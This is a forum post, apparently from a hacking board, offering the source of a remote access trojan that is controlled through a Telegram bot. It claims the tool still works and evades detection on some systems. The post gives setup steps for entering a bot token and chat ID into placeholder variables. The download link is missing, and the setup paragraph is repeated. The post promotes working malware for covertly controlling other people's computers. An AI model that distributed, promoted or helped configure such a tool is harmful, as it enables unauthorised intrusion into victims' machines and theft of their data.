02-19-2025, 09:11 AM
I'm sharing a RAT source file that has already been removed from public access, it still works perfectly, even undetectable on some systems. It allows you to remotely control PC via your Telegram bot.
Before compiling and using it, you need to obtain a token for your bot through BotFather and find out your chat ID. Then, enter the obtained data into the variables:
Replace them accordingly.
Here is the download link:
Before compiling and using it, you need to obtain a token for your bot through BotFather and find out your chat ID. Then, enter the obtained data into the variables:
token = 'your_bot_token'
adm = 'your_chat_id'
Replace them accordingly.
Here is the download link: